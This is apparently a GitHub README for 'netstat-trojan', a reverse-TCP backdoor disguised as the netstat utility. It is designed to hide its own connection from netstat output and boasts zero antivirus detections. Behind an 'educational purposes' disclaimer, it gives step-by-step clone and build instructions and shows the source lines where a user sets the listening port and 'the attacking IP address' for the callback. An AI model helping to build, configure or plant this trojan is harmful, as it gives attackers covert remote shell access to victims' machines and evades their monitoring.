/********************************************************************\
* DISCLAIMER: *
* *
* This program is for educational purposes only. Usage signifies *
* understanding of risks. Usage on unauthorized systems is *
* prohibited. *
* *
* - Use only with proper authorization. Unauthorized use is *
* strictly prohibited. *
* *
* - The creator assumes no liability for damages or legal *
* consequences caused by this program. *
* *
* - Ensure compliance with applicable laws and regulations. *
* *
* Use responsibly, ethically, and respect others' privacy and *
* security. *
\********************************************************************/
netstat-trojan is a reverse-TCP backdoor disguised within the netstat utility. It's designed to automatically exclude itself from the netstat output.
VIRUS TOTAL RESULTS 0/63
- Clone the repository:
git clone https://github.com/Drew-Alleman/netstat-trojan/
- Navigate to the cloned directory:
cd netstat-trojan/ - Initialize the configuration scripts:
./autogen.sh
- Run the configuration:
./configure
To configure the Netstat-Trojan to suit your specific needs, you will need to modify the netstat.c file:
-
Open
netstat.cin your preferred text editor. For example, usingvim:drew@ubuntu-desktop:~/Projects/netstat-trojan$ vim src/netstat.c -
Locate and modify the following settings:
- Port Configuration: Define the port to host the backdoor.
#define PORT 44566
- Server IP Configuration: Set the attacking IP address or the server address that the backdoor will connect to.
#define SERVER_IP "192.168.0.87"
- Port Configuration: Define the port to host the backdoor.
Ensure that you replace PORT and SERVER_IP with the values that align with your desired configuration.
Once all the steps above are complete simply run make and the netstat binary will appear here: /netstat-trojan/src/